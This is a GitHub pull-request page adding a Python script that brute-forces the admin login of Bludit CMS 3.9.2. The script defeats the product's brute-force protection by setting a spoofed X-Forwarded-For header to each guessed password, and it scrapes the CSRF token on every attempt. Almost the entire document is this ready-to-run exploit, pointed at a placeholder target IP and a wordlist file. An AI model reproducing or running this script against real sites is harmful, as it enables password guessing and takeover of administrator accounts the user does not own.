Merge pull request #1 from srikanthprathi/Pre-Master

Create bludit-CMD-3.9.2-Brute-Force-Protection-Bypass-script.py

Author: srikanthprathi

bludit-CMD-3.9.2-Brute-Force-Protection-Bypass-script.py

@@ -0,0 +1,43 @@
+#!/usr/bin/env python3
+import re
+import requests
+
+host = 'http://192.168.0.2'  # Change this with the target box IP address
+login_url = host + '/admin/login'
+username = 'admin'
+wordlist = '/home/kali/wordlists.txt'
+
+with open(wordlist) as f:
+        content = f.readlines()
+        word = [x.strip() for x in content]
+word_list = word
+
+for password in word_list:
+    session = requests.Session()
+    login_page = session.get(login_url)
+    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
+
+    print('[*] Trying: {p}'.format(p = password))
+
+    headers = {
+        'X-Forwarded-For': password,
+        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
+        'Referer': login_url
+    }
+
+    data = {
+        'tokenCSRF': csrf_token,
+        'username': username,
+        'password': password,
+        'save': ''
+    }
+
+    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)
+
+    if 'location' in login_result.headers:
+        if '/admin/dashboard' in login_result.headers['location']:
+            print()
+            print('SUCCESS: Password found!')
+            print('Use {u}:{p} to login.'.format(u = username, p = password))
+            print()
+            break